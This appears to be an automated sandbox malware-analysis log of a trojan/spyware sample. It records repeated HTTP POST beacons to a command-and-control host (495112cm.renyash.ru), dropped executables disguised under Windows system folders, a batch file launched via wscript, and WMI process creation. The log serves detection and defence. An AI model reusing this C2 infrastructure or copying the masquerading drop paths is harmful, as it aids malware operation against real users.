                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 1820 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 2516 Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 2516 Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 1820 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 2512 Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 2516 Expect: 100-continue Connection: Keep-Alive
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 495112cm.renyash.ru
                                    Source: unknown HTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 495112cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: serverDll.exe, 00000004.00000002.1837299833.0000000003091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q=
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.ico https://ch.search.yahoo.com/search
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q=
Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\ChainbrowserNet\backgroundTaskHost.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: 0_2_00A36FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00A36FAA
Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Windows\Vss\Writers\Application\upfc.exe
Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Windows\Vss\Writers\Application\ea1d8f6d871115
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BnGVmWDc.log 16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: String function: 00A4EC50 appears 56 times
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: String function: 00A4F5F0 appears 31 times
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: String function: 00A4EB78 appears 39 times
Source: HMhdtzxEHf.exe, 00000000.00000002.1671208896.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
Source: HMhdtzxEHf.exe, 00000000.00000003.1669507950.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
Source: HMhdtzxEHf.exe, 00000000.00000003.1669171959.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
Source: HMhdtzxEHf.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HMhdtzxEHf.exe
Source: HMhdtzxEHf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@84/378@1/1
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: 0_2_00A36C74 GetLastError,FormatMessageW,0_2_00A36C74
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: 0_2_00A4A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A4A6C2
Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe
Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Users\user\Desktop\jRHPiNPQ.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\ChainbrowserNet\backgroundTaskHost.exe Mutant created: NULL
Source: C:\ChainbrowserNet\backgroundTaskHost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Users\user\AppData\Local\Temp\5r0bQyFZF1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Command line argument: sfxname 0_2_00A4DF1E
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Command line argument: sfxstime 0_2_00A4DF1E
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Command line argument: STARTDLG 0_2_00A4DF1E
Source: HMhdtzxEHf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HMhdtzxEHf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\ChainbrowserNet\serverDll.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ChainbrowserNet\backgroundTaskHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe File read: C:\Windows\win.ini
